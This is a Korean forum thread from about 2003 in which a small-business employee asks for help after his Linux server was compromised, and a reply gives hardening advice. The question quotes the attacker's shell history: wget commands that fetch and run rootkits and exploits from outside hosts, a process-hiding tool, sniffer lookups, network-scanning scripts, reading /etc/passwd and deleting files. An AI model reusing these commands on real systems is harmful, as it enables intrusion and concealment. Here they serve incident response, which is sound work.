크래킹 피해

423,

10/22

indra

http://indra.linuxstudy.pe.kr

[re] 저희 회사 크래킹 당한것 같은데.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=25 [복사]

linux 를 설치만 하고 다 돌아간다고 해서 올바른 서버설치를 한것이 아닙니다.
영업하시는 분이라니.. 탁 터놓고 말씀드리겠습니다만
우리나라 대부분의 회사들이 '서버는 돌아가기만 하면 된다.' 라는 생각을
가지고 있지 않나요..
물론 회사의 금전적인 문제가 있어 엔지니어를 구하지 못하는 경우도 있을지 모르지만
외국에서는 대부분의 서버관리 엔지니어들이 5년이상은 되어야 명함을 내민다고 합니다.
서버의 보안, 그리고 서버의 제 성능을 내기 위해 실행하는 옵티마이징 기술,
그리고 각 서버 어플리케이션에 대한 문제점 확인 및 대처 능력 등등
서버관리자의 기술적 역할은 굉장히 큽니다.

이러한 기술적 역할을 할수 있는 사람을 뽑으시는것이
사후 대처를 위해서나 앞으로를 위해서나 더 나을것 입니다.
서버는 거짓말 하지 않습니다.
서버관리자의 실력대로.. 관리능력대로 서버가 서비스할때의 태도는 달라집니다.. :)

각설하고...
문제는 여러 루트킷들이 깔려있어 다른 서버로의 공격이 예상되는 상황입니다.
시스템을 깨끗이 밀고 재 설치 하시고, 필요한 어플리케이션만 설치하셔서 서비스 하도록 하십시요.
또한 이번에 linux-kernel 에 대한 취약점 보고도 있었습니다.
ftp://linux.sarang.net 이나 ftp://kernel.org 에 가셔서
최신의 kernel 을 다운받아 kernel 업그레이드를 해 주십시요.
물론 mail server 일 경우 MTA 로 사용되는 sendmail (or qmail?) 또한 최신버전으로
설치하여 사용하셔야 하며, apache, mysql (or oracle) 또한 최신버전으로
설치하시고 사용하십시요.
또한 telnet 보다는 ssh 을 사용하시는것이 좋고
ssh1 보다는 ssh2 를 사용하시는것이 좋습니다.
ps aux | less 명령으로 현재 프로세스에서 쓸데없는 프로세스가 있나 확인 하신 후,
쓸데없는 프로세스는 죽이시고, 런레벨 수준에서 아예 데몬이 사용되지 않도록 off 시켜놓는것이 좋을것 입니다.
netstat -na | grep LISTEN 으로 현재 서버의 열린 포트들을 점검하여,
서비스 되고 있지 않은 포트들의 개폐여부를 점검하시기 바랍니다.

마지막으로 redhat 기반의 리눅스 보다는 debian 을, 퍼포먼스 측면에서는,
freebsd 를 추천해 드리고 싶습니다.

>워낙 우리회사가 돈이 없어서
>영업좀 하려고 제가 배우가면서 리눅스로 서버를 만들었습니다.
>3일전에도 크래킹 당했는데.
>데이터 db 자료 다 날라가고
>그래서 복구 하는데 만 하루가 걸였습니다.
>그런데 나름대로 여기 와서 보안에 신경 써는데.
>똑 당했습니다.
>/home/dns/계정이 생겨고
>안에 .bash_history 보니까
>id
>wget raj.home.ro/man.tgz
>tar zxvf man.tgz
>rm -rf man.tgz
>cd man
>cat /etc/issue
>chmod +x raj
>./raj -d
>?hmod +x rh7
>./rh7
>chmod +x rh7
>./rh7
>./rh7
>./rh7
>./rh7
>./rh7
>./rh7
>wget mymail.home.ro/x
>chmox +x x
>./x
>chmod +x x
>./
>x./x
>./x
>id
>chmod +x inst
>./inst
>cd
>cd /usr/locale/sbin/pe/.pe12
>./sk
>locate .sniffer
>cd /usr/share/locale/sk/.ro/
>cat .sniffer
>rm -rf .sniffer
>w
>cd
>wget raj.home.ro/hide.tgz
>tar zxvf hide.tgz
>cd hide
>./hide dns 2 2
>cd ..
>ls -al
>rm -rf hide hide.tgz man
>wget www.geocities.com/maxy_0/aha.tgz
>tar aha.tgz
>tar zxvf aha.tgz
>./scanphp.sh 194.147
>tar zxvf aha.tgz
>./scanphp.sh 61.95
>LS -AL
>ls -al
>.nc
>./nc
>locate sniffer
>cat /usr/locale/sbin/pe/.pe12/.sniffer
>locate sniff
>locate tcp.log
>cat /etc/passwd
>ls -al
>cat .bash_profile
>cat .bash_logout
>rm -rf *
>
>생성이 됐더군요.
>
>그리고 find 명령어로
>
>find /dev/ -type f
>/dev/MAKEDEV
>/dev/hdx1
>/dev/ttyop
>/dev/ttyoa
>/dev/ttyof
>/dev/hdx2
>몇개의 백도어를 찾아습니다.
>
>
>휴~~~ 정말 세상 살아가기 힘든데.
>꼭 이런식으로 소기업들을 가지고 놀생각인가
>라인도 돈이 없어서 adsl라인을 사용 하고 있는데..
>
>부탁합니다.
>
>어떤 형식으로 저희 서버를 만지것지 대처 방안이 없나요
>
>복구하자마자 하루만에 들어와 이렇게 만들어놓고 같네요
>
>telnet을 사용해서 그런가 텔넷만 만으면 어느 정도 보안이 가능한지
>

Hit : 3879 Date : 2003/12/07 02:26